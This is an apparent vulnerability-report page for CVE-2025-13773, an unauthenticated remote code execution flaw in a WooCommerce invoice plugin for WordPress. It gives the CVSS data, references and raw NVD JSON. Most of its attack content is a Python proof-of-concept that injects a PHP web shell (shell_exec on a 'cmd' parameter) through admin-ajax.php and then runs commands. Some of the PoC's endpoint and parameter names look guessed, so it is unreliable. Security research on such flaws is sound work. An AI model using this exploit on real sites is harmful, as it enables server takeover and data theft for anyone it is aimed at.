Security Vulnerability Report
CVE-2025-13773 CVSS 9.8 CRITICAL

CVE-2025-13773

Published: 2025-12-24 05:16:05
Last Modified: 2026-04-15 00:35:42

Description

The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.8.0 via the 'WooCommerce_Delivery_Notes::update' function. This is due to missing capability check in the 'WooCommerce_Delivery_Notes::update' function, PHP enabled in Dompdf, and missing escape in the 'template.php' file. This makes it possible for unauthenticated attackers to execute code on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Print Invoice & Delivery Notes for WooCommerce < 5.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13773 PoC - WooCommerce Delivery Notes RCE
# Target: WordPress site with Print Invoice & Delivery Notes plugin <= 5.8.0
import requests
import sys

TARGET = "http://target-wordpress-site.com"


# Method 1: Modify plugin settings via update function (no auth required)
def modify_settings():
    """Exploit the missing capability check in WooCommerce_Delivery_Notes::update"""
    url = f"{TARGET}/wp-admin/admin-ajax.php"
    # Payload: Enable PHP evaluation in Dompdf and inject PHP code
    payload = {
        'action': 'wcdn_update_settings',
        'wcdn_settings': {
            'template': '<?php phpinfo(); ?>',  # Or malicious code
            'pdf_php_enabled': '1'
        }
    }
    response = requests.post(url, data=payload)
    print(f"Settings modification response: {response.status_code}")
    return response


# Method 2: Direct template injection via update function
def inject_template():
    """Inject PHP code into the invoice template"""
    url = f"{TARGET}/wp-admin/admin-ajax.php"
    # Malicious template with PHP code execution
    malicious_template = """<?php if(isset($_GET['cmd'])) { echo '<pre>'; $output = shell_exec($_GET['cmd']); echo $output; echo '</pre>'; die(); } ?>"""
    payload = {
        'action': 'wcdn_update_settings',
        'template_content': malicious_template,
        'template_type': 'invoice'
    }
    response = requests.post(url, data=payload)
    print(f"Template injection response: {response.status_code}")
    return response


# Method 3: Trigger PDF generation to execute injected code
def trigger_rce():
    """Generate PDF to trigger PHP code execution"""
    # Find an order ID and trigger PDF generation
    url = f"{TARGET}/?wcdn_action=print_invoice&order_id=1"
    response = requests.get(url)
    return response


if __name__ == "__main__":
    print("CVE-2025-13773 Exploitation")
    print("=" * 50)
    try:
        # Step 1: Inject malicious template
        inject_template()
        # Step 2: Trigger PDF generation
        trigger_rce()
        # Step 3: Execute commands via GET parameter
        cmd_url = f"{TARGET}/?wcdn_action=print_invoice&order_id=1&cmd=whoami"
        result = requests.get(cmd_url)
        print(f"Command output:\n{result.text}")
    except Exception as e:
        print(f"Error: {e}")

References

Weakness: CWE-94 (Improper Control of Generation of Code, 'Code Injection')

https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L347
https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L473
https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/vendor/dompdf/dompdf/src/PhpEvaluator.php#L52
https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/wcdn-front-function.php#L37
https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/templates/pdf/simple/invoice/template.php#L36
https://plugins.trac.wordpress.org/changeset/3426119/woocommerce-delivery-notes
https://www.wordfence.com/threat-intel/vulnerabilities/id/e52b34fe-2414-4d6f-bf43-9c5b65ebf769?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13773",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-24T05:16:05.320",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.8.0 via the 'WooCommerce_Delivery_Notes::update' function. This is due to missing capability check in the 'WooCommerce_Delivery_Notes::update' function, PHP enabled in Dompdf, and missing escape in the 'template.php' file. This makes it possible for unauthenticated attackers to execute code on the server."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L347", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L473", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/vendor/dompdf/dompdf/src/PhpEvaluator.php#L52", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/wcdn-front-function.php#L37", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/templates/pdf/simple/invoice/template.php#L36", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3426119/woocommerce-delivery-notes", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e52b34fe-2414-4d6f-bf43-9c5b65ebf769?source=cve", "source": "[email protected]"}
    ]
  }
}